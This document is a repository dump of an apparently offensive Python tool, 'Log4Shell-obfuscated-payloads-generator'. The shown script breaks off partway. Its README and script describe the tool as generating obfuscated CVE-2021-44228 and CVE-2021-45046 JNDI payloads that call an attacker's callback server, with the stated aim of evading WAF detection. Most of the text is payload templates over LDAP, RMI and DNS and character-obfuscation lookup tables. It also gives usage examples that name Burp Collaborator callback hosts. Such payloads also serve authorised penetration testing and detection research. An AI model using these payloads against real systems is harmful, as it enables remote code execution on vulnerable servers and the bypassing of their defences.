├── requirements.txt ├── img ├── help.png ├── primary44228.png ├── primary45046.png ├── secondary44228.png ├── secondary45046.png ├── usage-examples.png ├── burp collaborator client1.png ├── burp collaborator client2.png ├── burp-collaborator-client1.png ├── burp-collaborator-client2.png ├── primary44228secondary44228.png ├── primary45046secondary45046.png └── primary44228-without-server.png ├── secondary_obfuscated_template ├── lookup_prefix_char_obfuscated.txt ├── delimiter_obfuscated.txt ├── lower_case_obfuscated.txt └── upper_case_obfuscated.txt ├── payloads_template ├── cve_2021_45046_payloads_template.txt └── cve_2021_44228_payloads_template.txt ├── primary_obfuscated_template ├── delimiter_obfuscated.txt ├── lower_case_obfuscated.txt └── upper_case_obfuscated.txt ├── LICENSE ├── README-CN.md ├── README.md └── Log4Shell-obfuscated-payloads-generator.py /requirements.txt: -------------------------------------------------------------------------------- 1 | termcolor~=1.1.0 -------------------------------------------------------------------------------- /img/help.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/help.png -------------------------------------------------------------------------------- /img/primary44228.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/primary44228.png -------------------------------------------------------------------------------- /img/primary45046.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/primary45046.png -------------------------------------------------------------------------------- /img/secondary44228.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/secondary44228.png -------------------------------------------------------------------------------- /img/secondary45046.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/secondary45046.png -------------------------------------------------------------------------------- /img/usage-examples.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/usage-examples.png -------------------------------------------------------------------------------- /img/burp collaborator client1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/burp collaborator client1.png -------------------------------------------------------------------------------- /img/burp collaborator client2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/burp collaborator client2.png -------------------------------------------------------------------------------- /img/burp-collaborator-client1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/burp-collaborator-client1.png -------------------------------------------------------------------------------- /img/burp-collaborator-client2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/burp-collaborator-client2.png -------------------------------------------------------------------------------- /img/primary44228secondary44228.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/primary44228secondary44228.png -------------------------------------------------------------------------------- /img/primary45046secondary45046.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/primary45046secondary45046.png -------------------------------------------------------------------------------- /img/primary44228-without-server.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r3kind1e/Log4Shell-obfuscated-payloads-generator/HEAD/img/primary44228-without-server.png -------------------------------------------------------------------------------- /secondary_obfuscated_template/lookup_prefix_char_obfuscated.txt: -------------------------------------------------------------------------------- 1 | # Unprefixed Lookup template that replaces the Lookup prefix 2 | ${{{random_lookup}}:{{random_variable}}:-{{uppercase}}} 3 | ${{{random_lookup}}:{{random_variable}}:-{{lowercase}}} 4 | ${:-{{uppercase}}} 5 | ${:-{{lowercase}}} 6 | ${::-{{uppercase}}} 7 | ${::-{{lowercase}}} 8 | {{uppercase}} 9 | {{lowercase}} -------------------------------------------------------------------------------- /payloads_template/cve_2021_45046_payloads_template.txt: -------------------------------------------------------------------------------- 1 | # CVE-2021-45046 payloads template 2 | ${{{j_lookup}}{{n_lookup}}{{d_lookup}}{{i_lookup}}{{colon}}{{l_proto}}{{d_proto}}{{a_proto}}{{p_proto}}{{colon}}//127.0.0.1#{{callback_host}}:1389/{{random}}} 3 | ${{{j_lookup}}{{n_lookup}}{{d_lookup}}{{i_lookup}}{{colon}}{{l_proto}}{{d_proto}}{{a_proto}}{{p_proto}}{{colon}}//127.0.0.1#{{callback_host}}/{{random}}} -------------------------------------------------------------------------------- /payloads_template/cve_2021_44228_payloads_template.txt: -------------------------------------------------------------------------------- 1 | # CVE-2021-44228 payloads template 2 | ${{{j_lookup}}{{n_lookup}}{{d_lookup}}{{i_lookup}}{{colon}}{{l_proto}}{{d_proto}}{{a_proto}}{{p_proto}}{{colon}}//{{callback_host}}/{{random}}} 3 | ${{{j_lookup}}{{n_lookup}}{{d_lookup}}{{i_lookup}}{{colon}}{{l_proto}}{{d_proto}}{{a_proto}}{{p_proto}}{{colon}}//{{callback_host}}} 4 | ${{{j_lookup}}{{n_lookup}}{{d_lookup}}{{i_lookup}}{{colon}}{{r_proto}}{{m_proto}}{{i_proto}}{{colon}}//{{callback_host}}/{{random}}} 5 | ${{{j_lookup}}{{n_lookup}}{{d_lookup}}{{i_lookup}}{{colon}}{{d_proto}}{{n_proto}}{{s_proto}}{{colon}}//{{callback_host}}/{{random}}} -------------------------------------------------------------------------------- /primary_obfuscated_template/delimiter_obfuscated.txt: -------------------------------------------------------------------------------- 1 | # Primary Obfuscated Colon Template 2 | : 3 | ${::-:} 4 | ${lower::} 5 | ${k8s:{{random_variable}}:-:} 6 | ${env:{{random_variable}}:-:} 7 | ${ctx:{{random_variable}}:-:} 8 | ${main:{{main_argument_key}}:-:} 9 | ${main:{{random_variable}}:-:} 10 | ${map:{{random_variable}}:-:} 11 | ${sd:{{random_variable}}:-:} 12 | ${sys:{{random_variable}}:-:} 13 | ${web:{{random_variable}}:-:} 14 | ${docker:{{random_variable}}:-:} 15 | ${event:{{random_variable}}:-:} 16 | ${log4j:{{random_variable}}:-:} 17 | ${marker:{{random_variable}}:-:} 18 | ${spring:{{random_variable}}:-:} 19 | ${upper::} 20 | ${:-:} 21 | ${{{random_lookup}}:{{random_variable}}:-:} -------------------------------------------------------------------------------- /primary_obfuscated_template/lower_case_obfuscated.txt: -------------------------------------------------------------------------------- 1 | # Primary Obfuscated Lowercase Template 2 | {{lowercase}} 3 | ${::-{{lowercase}}} 4 | ${lower:{{lowercase}}} 5 | ${lower:{{uppercase}}} 6 | ${k8s:{{random_variable}}:-{{lowercase}}} 7 | ${env:{{random_variable}}:-{{lowercase}}} 8 | ${ctx:{{random_variable}}:-{{lowercase}}} 9 | ${main:{{main_argument_key}}:-{{lowercase}}} 10 | ${main:{{random_variable}}:-{{lowercase}}} 11 | ${map:{{random_variable}}:-{{lowercase}}} 12 | ${sd:{{random_variable}}:-{{lowercase}}} 13 | ${sys:{{random_variable}}:-{{lowercase}}} 14 | ${web:{{random_variable}}:-{{lowercase}}} 15 | ${docker:{{random_variable}}:-{{lowercase}}} 16 | ${event:{{random_variable}}:-{{lowercase}}} 17 | ${log4j:{{random_variable}}:-{{lowercase}}} 18 | ${marker:{{random_variable}}:-{{lowercase}}} 19 | ${spring:{{random_variable}}:-{{lowercase}}} 20 | ${:-{{lowercase}}} 21 | ${{{random_lookup}}:{{random_variable}}:-{{lowercase}}} -------------------------------------------------------------------------------- /primary_obfuscated_template/upper_case_obfuscated.txt: -------------------------------------------------------------------------------- 1 | # Primary Obfuscated Uppercase Template 2 | {{uppercase}} 3 | ${::-{{uppercase}}} 4 | ${k8s:{{random_variable}}:-{{uppercase}}} 5 | ${env:{{random_variable}}:-{{uppercase}}} 6 | ${ctx:{{random_variable}}:-{{uppercase}}} 7 | ${main:{{main_argument_key}}:-{{uppercase}}} 8 | ${main:{{random_variable}}:-{{uppercase}}} 9 | ${map:{{random_variable}}:-{{uppercase}}} 10 | ${sd:{{random_variable}}:-{{uppercase}}} 11 | ${sys:{{random_variable}}:-{{uppercase}}} 12 | ${web:{{random_variable}}:-{{uppercase}}} 13 | ${docker:{{random_variable}}:-{{uppercase}}} 14 | ${event:{{random_variable}}:-{{uppercase}}} 15 | ${log4j:{{random_variable}}:-{{uppercase}}} 16 | ${marker:{{random_variable}}:-{{uppercase}}} 17 | ${spring:{{random_variable}}:-{{uppercase}}} 18 | ${upper:{{uppercase}}} 19 | ${upper:{{lowercase}}} 20 | ${:-{{uppercase}}} 21 | ${{{random_lookup}}:{{random_variable}}:-{{uppercase}}} -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 r3kind1e 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /secondary_obfuscated_template/delimiter_obfuscated.txt: -------------------------------------------------------------------------------- 1 | # Secondary Obfuscated Colon Template 2 | : 3 | ${::-:} 4 | ${{{l_lookup}}{{o_lookup}}{{w_lookup}}{{e_lookup}}{{r_lookup}}::} 5 | ${{{k_lookup}}{{8_lookup}}{{s_lookup}}:{{random_variable}}:-:} 6 | ${{{e_lookup}}{{n_lookup}}{{v_lookup}}:{{random_variable}}:-:} 7 | ${{{c_lookup}}{{t_lookup}}{{x_lookup}}:{{random_variable}}:-:} 8 | ${{{m_lookup}}{{a_lookup}}{{i_lookup}}{{n_lookup}}:{{main_argument_key}}:-:} 9 | ${{{m_lookup}}{{a_lookup}}{{i_lookup}}{{n_lookup}}:{{random_variable}}:-:} 10 | ${{{m_lookup}}{{a_lookup}}{{p_lookup}}:{{random_variable}}:-:} 11 | ${{{s_lookup}}{{d_lookup}}:{{random_variable}}:-:} 12 | ${{{s_lookup}}{{y_lookup}}{{s_lookup}}:{{random_variable}}:-:} 13 | ${{{w_lookup}}{{e_lookup}}{{b_lookup}}:{{random_variable}}:-:} 14 | ${{{d_lookup}}{{o_lookup}}{{c_lookup}}{{k_lookup}}{{e_lookup}}{{r_lookup}}:{{random_variable}}:-:} 15 | ${{{e_lookup}}{{v_lookup}}{{e_lookup}}{{n_lookup}}{{t_lookup}}:{{random_variable}}:-:} 16 | ${{{l_lookup}}{{o_lookup}}{{g_lookup}}{{4_lookup}}{{j_lookup}}:{{random_variable}}:-:} 17 | ${{{m_lookup}}{{a_lookup}}{{r_lookup}}{{k_lookup}}{{e_lookup}}{{r_lookup}}:{{random_variable}}:-:} 18 | ${{{s_lookup}}{{p_lookup}}{{r_lookup}}{{i_lookup}}{{n_lookup}}{{g_lookup}}:{{random_variable}}:-:} 19 | ${{{u_lookup}}{{p_lookup}}{{p_lookup}}{{e_lookup}}{{r_lookup}}::} 20 | ${:-:} 21 | ${{{random_lookup}}:{{random_variable}}:-:} -------------------------------------------------------------------------------- /secondary_obfuscated_template/lower_case_obfuscated.txt: -------------------------------------------------------------------------------- 1 | # Secondary Obfuscated Lowercase Template 2 | {{lowercase}} 3 | ${::-{{lowercase}}} 4 | ${{{l_lookup}}{{o_lookup}}{{w_lookup}}{{e_lookup}}{{r_lookup}}:{{lowercase}}} 5 | ${{{l_lookup}}{{o_lookup}}{{w_lookup}}{{e_lookup}}{{r_lookup}}:{{uppercase}}} 6 | ${{{k_lookup}}{{8_lookup}}{{s_lookup}}:{{random_variable}}:-{{lowercase}}} 7 | ${{{e_lookup}}{{n_lookup}}{{v_lookup}}:{{random_variable}}:-{{lowercase}}} 8 | ${{{c_lookup}}{{t_lookup}}{{x_lookup}}:{{random_variable}}:-{{lowercase}}} 9 | ${{{m_lookup}}{{a_lookup}}{{i_lookup}}{{n_lookup}}:{{main_argument_key}}:-{{lowercase}}} 10 | ${{{m_lookup}}{{a_lookup}}{{i_lookup}}{{n_lookup}}:{{random_variable}}:-{{lowercase}}} 11 | ${{{m_lookup}}{{a_lookup}}{{p_lookup}}:{{random_variable}}:-{{lowercase}}} 12 | ${{{s_lookup}}{{d_lookup}}:{{random_variable}}:-{{lowercase}}} 13 | ${{{s_lookup}}{{y_lookup}}{{s_lookup}}:{{random_variable}}:-{{lowercase}}} 14 | ${{{w_lookup}}{{e_lookup}}{{b_lookup}}:{{random_variable}}:-{{lowercase}}} 15 | ${{{d_lookup}}{{o_lookup}}{{c_lookup}}{{k_lookup}}{{e_lookup}}{{r_lookup}}:{{random_variable}}:-{{lowercase}}} 16 | ${{{e_lookup}}{{v_lookup}}{{e_lookup}}{{n_lookup}}{{t_lookup}}:{{random_variable}}:-{{lowercase}}} 17 | ${{{l_lookup}}{{o_lookup}}{{g_lookup}}{{4_lookup}}{{j_lookup}}:{{random_variable}}:-{{lowercase}}} 18 | ${{{m_lookup}}{{a_lookup}}{{r_lookup}}{{k_lookup}}{{e_lookup}}{{r_lookup}}:{{random_variable}}:-{{lowercase}}} 19 | ${{{s_lookup}}{{p_lookup}}{{r_lookup}}{{i_lookup}}{{n_lookup}}{{g_lookup}}:{{random_variable}}:-{{lowercase}}} 20 | ${:-{{lowercase}}} 21 | ${{{random_lookup}}:{{random_variable}}:-{{lowercase}}} -------------------------------------------------------------------------------- /secondary_obfuscated_template/upper_case_obfuscated.txt: -------------------------------------------------------------------------------- 1 | # Secondary Obfuscated Uppercase Template 2 | {{uppercase}} 3 | ${::-{{uppercase}}} 4 | ${{{k_lookup}}{{8_lookup}}{{s_lookup}}:{{random_variable}}:-{{uppercase}}} 5 | ${{{e_lookup}}{{n_lookup}}{{v_lookup}}:{{random_variable}}:-{{uppercase}}} 6 | ${{{c_lookup}}{{t_lookup}}{{x_lookup}}:{{random_variable}}:-{{uppercase}}} 7 | ${{{m_lookup}}{{a_lookup}}{{i_lookup}}{{n_lookup}}:{{main_argument_key}}:-{{uppercase}}} 8 | ${{{m_lookup}}{{a_lookup}}{{i_lookup}}{{n_lookup}}:{{random_variable}}:-{{uppercase}}} 9 | ${{{m_lookup}}{{a_lookup}}{{p_lookup}}:{{random_variable}}:-{{uppercase}}} 10 | ${{{s_lookup}}{{d_lookup}}:{{random_variable}}:-{{uppercase}}} 11 | ${{{s_lookup}}{{y_lookup}}{{s_lookup}}:{{random_variable}}:-{{uppercase}}} 12 | ${{{w_lookup}}{{e_lookup}}{{b_lookup}}:{{random_variable}}:-{{uppercase}}} 13 | ${{{d_lookup}}{{o_lookup}}{{c_lookup}}{{k_lookup}}{{e_lookup}}{{r_lookup}}:{{random_variable}}:-{{uppercase}}} 14 | ${{{e_lookup}}{{v_lookup}}{{e_lookup}}{{n_lookup}}{{t_lookup}}:{{random_variable}}:-{{uppercase}}} 15 | ${{{l_lookup}}{{o_lookup}}{{g_lookup}}{{4_lookup}}{{j_lookup}}:{{random_variable}}:-{{uppercase}}} 16 | ${{{m_lookup}}{{a_lookup}}{{r_lookup}}{{k_lookup}}{{e_lookup}}{{r_lookup}}:{{random_variable}}:-{{uppercase}}} 17 | ${{{s_lookup}}{{p_lookup}}{{r_lookup}}{{i_lookup}}{{n_lookup}}{{g_lookup}}:{{random_variable}}:-{{uppercase}}} 18 | ${{{u_lookup}}{{p_lookup}}{{p_lookup}}{{e_lookup}}{{r_lookup}}:{{uppercase}}} 19 | ${{{u_lookup}}{{p_lookup}}{{p_lookup}}{{e_lookup}}{{r_lookup}}:{{lowercase}}} 20 | ${:-{{uppercase}}} 21 | ${{{random_lookup}}:{{random_variable}}:-{{uppercase}}} -------------------------------------------------------------------------------- /README-CN.md: -------------------------------------------------------------------------------- 1 | # Log4Shell-obfuscated-payloads-generator 2 | Log4Shell-obfuscated-payloads-generator可以生成初级混淆的或二级混淆的CVE-2021-44228或CVE-2021-45046 payloads,以规避WAF检测。 3 | 4 | [Log4Shell-obfuscated-payloads-generator的设计思想](https://r3kind1e.github.io/2022/05/26/Log4Shell-obfuscated-payloads-generator/) 5 | 6 | ## 安装 7 | ``` 8 | git clone https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator.git 9 | ``` 10 | 11 | Log4Shell-obfuscated-payloads-generator在任何平台上都可以在Python 3.x版本中开箱即用。 12 | 13 | ## Usage 14 | 要获取基本选项列表,请使用: 15 | 16 | ``` 17 | python3 Log4Shell-obfuscated-payloads-generator.py -h 18 | ``` 19 | 20 | 要获取使用示例,请使用: 21 | 22 | ``` 23 | python3 Log4Shell-obfuscated-payloads-generator.py -hh 24 | ``` 25 | 26 | ## Screenshots 27 | `-h`: 获取基本选项列表 28 | ![help](img/help.png) 29 | 30 | `-hh`: 获取使用示例 31 | ![usage-examples](img/usage-examples.png) 32 | 33 | 使用单个选项生成有效负载,`-s`选项指定恶意服务器: 34 | ``` 35 | --generate-primary-obfuscated-cve-2021-44228-payload 8 -s ck0pf4l6fmq4w0v17o7t894txk3arz.oastify.com 36 | ``` 37 | ![primary44228](img/primary44228.png) 38 | ![burp-collaborator-client1](img/burp-collaborator-client1.png) 39 | 40 | ``` 41 | --generate-primary-obfuscated-cve-2021-45046-payload 4 -s x53a0p6r07bphlgms9setupei5owcl.oastify.com 42 | ``` 43 | ![primary45046](img/primary45046.png) 44 | 45 | ``` 46 | --generate-secondary-obfuscated-cve-2021-44228-payload 5 -s oia1rpap41mhxkp6rdbbywit1k7avz.oastify.com 47 | ``` 48 | ![secondary44228](img/secondary44228.png) 49 | ![burp-collaborator-client2](img/burp-collaborator-client2.png) 50 | 51 | ``` 52 | --generate-secondary-obfuscated-cve-2021-45046-payload 5 -s 3vzg44n4hgzwaz2l4soqbbv8ezkq8f.oastify.com 53 | ``` 54 | ![secondary45046](img/secondary45046.png) 55 | 56 | 使用多个选项来生成有效负载,`-s` 选项指定了恶意服务器: 57 | ``` 58 | --generate-primary-obfuscated-cve-2021-44228-payload 4 --generate-secondary-obfuscated-cve-2021-44228-payload 4 -s exfr6fpfjr17ca4w63q1dmxjgam2ar.oastify.com 59 | ``` 60 | ![primary44228secondary44228](img/primary44228secondary44228.png) 61 | 62 | 如果不使用`-s`选项指定恶意服务器,`{{callback_host}}`占位符将保留在生成的有效负载中: 63 | ``` 64 | --generate-primary-obfuscated-cve-2021-44228-payload 3 65 | ``` 66 | ![primary44228-without-server](img/primary44228-without-server.png) 67 | ``` 68 | --generate-primary-obfuscated-cve-2021-45046-payload 3 --generate-secondary-obfuscated-cve-2021-45046-payload 7 69 | ``` 70 | ![primary45046secondary45046](img/primary45046secondary45046.png) 71 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Log4Shell-obfuscated-payloads-generator 2 | Log4Shell-obfuscated-payloads-generator can generate primary obfuscated or secondary obfuscated CVE-2021-44228 or CVE-2021-45046 payloads to evade WAF detection. 3 | 4 | [The design idea of ​​Log4Shell-obfuscated-payloads-generator](https://r3kind1e.github.io/2022/05/26/Log4Shell-obfuscated-payloads-generator/) 5 | 6 | ## Installation 7 | ``` 8 | git clone https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator.git 9 | ``` 10 | 11 | Log4Shell-obfuscated-payloads-generator works out of the box with Python version 3.x on any platform. 12 | 13 | ## Usage 14 | To get a list of basic options use: 15 | 16 | ``` 17 | python3 Log4Shell-obfuscated-payloads-generator.py -h 18 | ``` 19 | 20 | To get usage examples use: 21 | 22 | ``` 23 | python3 Log4Shell-obfuscated-payloads-generator.py -hh 24 | ``` 25 | 26 | ## Screenshots 27 | `-h`: get a list of basic options 28 | ![help](img/help.png) 29 | 30 | `-hh`: get usage examples 31 | ![usage-examples](img/usage-examples.png) 32 | 33 | With a single option to generate payloads, the `-s` option specifies the malicious server: 34 | ``` 35 | --generate-primary-obfuscated-cve-2021-44228-payload 8 -s ck0pf4l6fmq4w0v17o7t894txk3arz.oastify.com 36 | ``` 37 | ![primary44228](img/primary44228.png) 38 | ![burp-collaborator-client1](img/burp-collaborator-client1.png) 39 | 40 | ``` 41 | --generate-primary-obfuscated-cve-2021-45046-payload 4 -s x53a0p6r07bphlgms9setupei5owcl.oastify.com 42 | ``` 43 | ![primary45046](img/primary45046.png) 44 | 45 | ``` 46 | --generate-secondary-obfuscated-cve-2021-44228-payload 5 -s oia1rpap41mhxkp6rdbbywit1k7avz.oastify.com 47 | ``` 48 | ![secondary44228](img/secondary44228.png) 49 | ![burp-collaborator-client2](img/burp-collaborator-client2.png) 50 | 51 | ``` 52 | --generate-secondary-obfuscated-cve-2021-45046-payload 5 -s 3vzg44n4hgzwaz2l4soqbbv8ezkq8f.oastify.com 53 | ``` 54 | ![secondary45046](img/secondary45046.png) 55 | 56 | With multiple options to generate payloads, the `-s` option specifies a malicious server: 57 | ``` 58 | --generate-primary-obfuscated-cve-2021-44228-payload 4 --generate-secondary-obfuscated-cve-2021-44228-payload 4 -s exfr6fpfjr17ca4w63q1dmxjgam2ar.oastify.com 59 | ``` 60 | ![primary44228secondary44228](img/primary44228secondary44228.png) 61 | 62 | Without specifying a malicious server with the `-s` option, the `{{callback_host}}` placeholder will be preserved in the generated payloads: 63 | ``` 64 | --generate-primary-obfuscated-cve-2021-44228-payload 3 65 | ``` 66 | ![primary44228-without-server](img/primary44228-without-server.png) 67 | ``` 68 | --generate-primary-obfuscated-cve-2021-45046-payload 3 --generate-secondary-obfuscated-cve-2021-45046-payload 7 69 | ``` 70 | ![primary45046secondary45046](img/primary45046secondary45046.png) 71 | -------------------------------------------------------------------------------- /Log4Shell-obfuscated-payloads-generator.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # coding=utf-8 3 | import argparse 4 | import os 5 | import string 6 | import sys 7 | import time 8 | import random 9 | 10 | from termcolor import cprint 11 | 12 | parser = argparse.ArgumentParser() 13 | 14 | parser.add_argument("-hh", "--advanced-help", 15 | dest="advanced_help", 16 | help="Usage examples.", 17 | action="store_true") 18 | parser.add_argument("-s", "--server", 19 | dest="server", 20 | help="Malicious Server.", 21 | action='store') 22 | parser.add_argument("--generate-primary-obfuscated-cve-2021-44228-payload", 23 | dest="number_of_generated_primary_obfuscated_cve_2021_44228_payloads", 24 | help="Generate primary obfuscated CVE-2021-44228 payloads based on the specified number. Output the " 25 | "results to out/CVE-2021-44228/primary/timestamp-cve_2021_44228-primary-obfuscated_payloads.txt.", 26 | default=argparse.SUPPRESS, 27 | type=int, 28 | action='store') 29 | parser.add_argument("--generate-primary-obfuscated-cve-2021-45046-payload", 30 | dest="number_of_generated_primary_obfuscated_cve_2021_45046_payloads", 31 | help="Generates primary obfuscated CVE-2021-45046 payloads based on the specified number. Output the " 32 | "results to out/CVE-2021-45046/primary/timestamp-cve_2021_45046-primary-obfuscated_payloads.txt.", 33 | default=argparse.SUPPRESS, 34 | type=int, 35 | action='store') 36 | parser.add_argument("--generate-secondary-obfuscated-cve-2021-44228-payload", 37 | dest="number_of_generated_secondary_obfuscated_cve_2021_44228_payloads", 38 | help= "Generate secondary obfuscated CVE-2021-44228 payloads based on the specified number. Output the" 39 | " results to out/CVE-2021-44228/secondary/timestamp-cve_2021_44228-secondary-obfuscated-payloads.txt.", 40 | default=argparse.SUPPRESS, 41 | type=int, 42 | action='store') 43 | parser.add_argument("--generate-secondary-obfuscated-cve-2021-45046-payload", 44 | dest="number_of_generated_secondary_obfuscated_cve_2021_45046_payloads", 45 | help="Generate secondary obfuscated CVE-2021-45046 payloads based on the specified number. Output the" 46 | " results to out/CVE-2021-45046/secondary/timestamp-cve_2021_45046-secondary-obfuscated-payloads.txt.", 47 | default=argparse.SUPPRESS, 48 | type=int, 49 | action='store') 50 | 51 | args = parser.parse_args() 52 | 53 | 54 | def print_banner(): 55 | cprint("Log4Shell-obfuscated-payloads-generator: Generate primary obfuscated or secondary obfuscated CVE-2021-44228" 56 | " or CVE-2021-45046 payloads to evade WAF detection.", "yellow") 57 | cprint("Author: r3kind1e", "yellow") 58 | cprint("Blog: https://r3kind1e.github.io/", "yellow") 59 | cprint("Organization: 0range-Sec-Team", "yellow") 60 | cprint("Blog: https://0range-sec-team.github.io/", "yellow") 61 | print() 62 | 63 | 64 | def print_help_msg(): 65 | if len(sys.argv) <= 1: 66 | cprint(f"{os.path.basename(__file__)}: error: missing an option, use -h for basic or -hh for advanced help.", "red") 67 | if args.advanced_help: 68 | cprint("Usage examples: ", "green") 69 | cprint("With a single option to generate payloads, the -s option specifies the malicious server:", "green") 70 | print("--generate-primary-obfuscated-cve-2021-44228-payload 8 -s kbz8tlcz2at7fnbcb9kazo8qwh27qw.oastify.com") 71 | print("--generate-primary-obfuscated-cve-2021-45046-payload 4 -s y43mmz5dvoml814q4ndos214pvvmjb.oastify.com") 72 | print("--generate-secondary-obfuscated-cve-2021-44228-payload 5 -s oumccpv3lecbyrugud3eisruflld92.oastify.com") 73 | print("--generate-secondary-obfuscated-cve-2021-45046-payload 7 -s mwmaenx1nce90pwewb5ckqtshjncb1.oastify.com") 74 | print() 75 | cprint("With multiple options to generate payloads, the -s option specifies a malicious server:", "green") 76 | print("--generate-primary-obfuscated-cve-2021-44228-payload 6 --generate-primary-obfuscated-cve-2021-45046-payload 3 -s 58btq69kzvqsc88x8uhvw95bt2zxnm.oastify.com") 77 | print("--generate-primary-obfuscated-cve-2021-44228-payload 2 --generate-secondary-obfuscated-cve-2021-44228-payload 1 -s 378rp48iytpqb67v7sgtv749s0ywml.oastify.com") 78 | print("--generate-primary-obfuscated-cve-2021-44228-payload 5 --generate-secondary-obfuscated-cve-2021-45046-payload 4 -s 9blxtaco2ztwfcb1bykzzd8fw623qs.oastify.com") 79 | print("--generate-primary-obfuscated-cve-2021-45046-payload 4 --generate-secondary-obfuscated-cve-2021-44228-payload 8 -s kth8bluzkab7xntct92ahoqqehkf84.oastify.com") 80 | print("--generate-primary-obfuscated-cve-2021-45046-payload 3 --generate-secondary-obfuscated-cve-2021-45046-payload 7 -s 4ins05jj9u0rm7iwitru68fa3190xp.oastify.com") 81 | print("--generate-secondary-obfuscated-cve-2021-44228-payload 6 --generate-secondary-obfuscated-cve-2021-45046-payload 5 -s k6r8ol7zxao7an6c69fauo3qrhxhl6.oastify.com") 82 | print() 83 | cprint("Without specifying a malicious server with the -s option, the {{callback_host}} placeholder will be preserved in the generated payloads:", "green") 84 | print("--generate-primary-obfuscated-cve-2021-44228-payload 3") 85 | print("--generate-secondary-obfuscated-cve-2021-44228-payload 6 --generate-secondary-obfuscated-cve-2021-45046-payload 5") 86 | print() 87 | 88 | 89 | def load_payloads_template(): 90 | """ 91 | Load the payloads template 92 | """ 93 | read_file_to_list("payloads_template/cve_2021_44228_payloads_template.txt", cve_2021_44228_obfuscated_payloads_template) 94 | read_file_to_list("payloads_template/cve_2021_45046_payloads_template.txt", cve_2021_45046_obfuscated_payloads_template) 95 | 96 | 97 | def get_filepath_template_num(option): 98 | filepath = None 99 | template = None 100 | num = None 101 | timestamp = time.strftime("%Y%m%d_%H%M%S") 102 | if option == 'number_of_generated_primary_obfuscated_cve_2021_44228_payloads': 103 | filename = timestamp + "-cve_2021_44228-primary-obfuscated_payloads.txt" 104 | filepath = "out/CVE-2021-44228/primary/" + filename 105 | template = cve_2021_44228_obfuscated_payloads_template 106 | num = args.number_of_generated_primary_obfuscated_cve_2021_44228_payloads 107 | 108 | if option == 'number_of_generated_primary_obfuscated_cve_2021_45046_payloads': 109 | filename = timestamp + "-cve_2021_45046-primary-obfuscated_payloads.txt" 110 | filepath = "out/CVE-2021-45046/primary/" + filename 111 | template = cve_2021_45046_obfuscated_payloads_template 112 | num = args.number_of_generated_primary_obfuscated_cve_2021_45046_payloads 113 | 114 | if option == 'number_of_generated_secondary_obfuscated_cve_2021_44228_payloads': 115 | filename = timestamp + "-cve_2021_44228-secondary-obfuscated_payloads.txt" 116 | filepath = "out/CVE-2021-44228/secondary/" + filename 117 | template = cve_2021_44228_obfuscated_payloads_template 118 | num = args.number_of_generated_secondary_obfuscated_cve_2021_44228_payloads 119 | 120 | if option == 'number_of_generated_secondary_obfuscated_cve_2021_45046_payloads': 121 | filename = timestamp + "-cve_2021_45046-secondary-obfuscated_payloads.txt" 122 | filepath = "out/CVE-2021-45046/secondary/" + filename 123 | template = cve_2021_45046_obfuscated_payloads_template 124 | num = args.number_of_generated_secondary_obfuscated_cve_2021_45046_payloads 125 | return [filepath, template, num] 126 | 127 | 128 | def generate_obfuscated_payloads(templates, num, is_secondary_obfuscated): 129 | """ 130 | Generate a specified number of obfuscated payloads. 131 | :description: According to the specified number, randomly select the payloads template, and replace the placeholder 132 | in each selected payload template with the obfuscated form of the character. After all the substitutions are done, 133 | return the specified number of obfuscated payloads as a list. 134 | :param templates: payloads template(CVE-2021-44228 or CVE-2021-45046) 135 | :param num: number of payloads 136 | :param is_secondary_obfuscated: boolean 137 | :return: list 138 | """ 139 | selected_template = random.choices(templates, k=num) 140 | obfuscated_payloads = [] 141 | 142 | if is_secondary_obfuscated: 143 | mapping = 